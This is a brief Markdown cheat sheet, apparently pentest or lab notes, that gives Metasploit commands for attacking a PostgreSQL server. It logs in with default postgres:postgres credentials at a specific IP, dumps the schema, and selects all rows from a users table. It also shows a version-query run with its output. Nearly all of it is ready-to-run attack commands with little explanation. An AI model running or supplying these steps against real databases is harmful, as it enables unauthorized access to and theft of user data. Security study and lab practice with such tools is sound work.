32 lines
921 B
Markdown
32 lines
921 B
Markdown
|
## Commands
|
||
|
Take notes that your sessions should also be in background for those steps to work
|
||
|
|
||
|
Extract Data
|
||
|
```
|
||
|
# Dump the schema
|
||
|
use auxiliary/scanner/postgres/postgres_schemadump
|
||
|
run postgres://postgres:postgres@172.28.101.51/postgres
|
||
|
|
||
|
# Select information from a specific table
|
||
|
use auxiliary/admin/postgres/postgres_sql
|
||
|
run postgres://postgres:postgres@172.28.101.51/postgres sql='select * from users'
|
||
|
```
|
||
|
|
||
|
- Simply change the SQL= query to the desired search
|
||
|
|
||
|
|
||
|
Version
|
||
|
```
|
||
|
msf6 > use admin/postgres/postgres_sql
|
||
|
msf6 auxiliary(admin/postgres/postgres_sql) > run postgres://user:password@MACHINE_IP/database_name sql='select version()'
|
||
|
|
||
|
[*] Running module against IP
|
||
|
|
||
|
Query Text: 'select version()'
|
||
|
==============================
|
||
|
|
||
|
version
|
||
|
-------
|
||
|
PostgreSQL 10.5 on x86_64-pc-linux-musl, compiled by gcc (Alpine 6.4.0) 6.4.0, 64-bit
|
||
|
|
||
|
[*] Auxiliary module execution completed
|